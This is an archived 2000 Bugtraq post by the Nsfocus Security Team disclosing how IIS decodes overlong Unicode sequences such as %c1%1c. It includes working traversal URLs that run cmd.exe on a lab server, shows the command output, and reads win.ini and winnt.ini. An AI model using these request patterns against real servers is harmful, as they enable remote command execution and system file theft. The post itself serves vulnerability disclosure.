[17249] in bugtraq
Re: IIS %c1%1c remote command execution
daemon@ATHENA.MIT.EDU (Nsfocus Security Team)
Wed Oct 18 09:48:42 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="GB2312"
Message-ID: <200010180741.PAA09855@intra.nsfocus.com>
Date: Wed, 18 Oct 2000 15:35:31 +0800
Reply-To: Nsfocus Security Team <security@NSFOCUS.COM>
From: Nsfocus Security Team <security@NSFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
We found this bug several weeks ago.
When we are ready to report it to Microsoft , we found it has been posted in BugTraq.
A member of our team disassembled the IIS 5.0 (Chinese version) Unicode decoding
implementation, he found a strange decoding method when IIS found "%c1%hh" and
"%c0%hh" (0x00<= 0xhh < 0x40)
IIS will decode "%c1%hh" to (0xc1 -0xc0) * 0x40 + 0xhh.
IIS will decode "%c0%hh" to (0xc0 -0xc0) * 0x40 + 0xhh.
example (Windows 2000 + IIS 5.0 + SP1 for Simplify Chinese version):
http://192.168.8.48/A.ida/%c1%00.ida
IIS said"@.ida" can't be found
here: ги0xc1-0xc0)*0x40+0x00=0x40='@'
http://192.168.8.48/A.ida/%c1%01.ida
IIS said "A.ida" can't be found
here: ги0xc1-0xc0)*0x40+0x01=0x41='A'
http://192.168.8.48/A.ida/%c1%02.ida
IIS said "B.ida" can't be found
....
http://192.168.8.48/A.ida/%c0%21.ida
IIS said "!.ida" can't be found
...
It means you can encode most characters with this feature.
For example:
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
We guess that we can use it to bypass some directory restriction:
(1)
http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
Now we get:
Directory of d:\inetpub\scripts
2000-09-28 15:49 <DIR> .
2000-09-28 15:49 <DIR> ..
1999-07-21 17:49 147,456 Count.exe
2000-09-12 17:08 438,290 Count25.exe
2000-10-13 15:03 8,867 counter.err
2000-08-23 23:07 160,002 counter.exe
1999-05-25 18:14 3,925 CountNT.html
1999-07-21 17:49 64,512 extdgts.exe
2000-08-10 15:24 46,352 ism.dll
1999-07-21 17:49 64,512 mkstrip.exe
1999-05-25 18:18 1,317 README.txt
2000-09-28 15:49 <DIR> wcount
9 File(s) 935,233 bytes
(2) we can get the content of some system files with this bug too:
http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
IIS deems it to be a request for a .ASP file.It will call asp.dll to open
the file win.ini.
For IIS 4.0+SP6(Chinese), the URL above failed. It seems that IIS is getting
smarter. But we found it is interesting that we can use this malformed URL
to trick IIS to get the winnt.ini:
http://192.168.8.100/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini
"default.asp" should be an existing .ASP file.
"a.exe" is random .EXE file name. It can be a nonexisting file.
It looks IIS 4.0/5.0 for English version has different decoding implementation.
---Original Message---
>Recently I received an email from Par Osterberg that directed my attention
>to a post in the Packetstorm forums:
>
>http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&uname=anonymous&datopic=Windows&mesgcheck=defined&gum=474&editoron=
>
[...]
>
>- rain forest puppy
Regards,
Nsfocus Security Team <security@nsfocus.com>
http://www.nsfocus.com
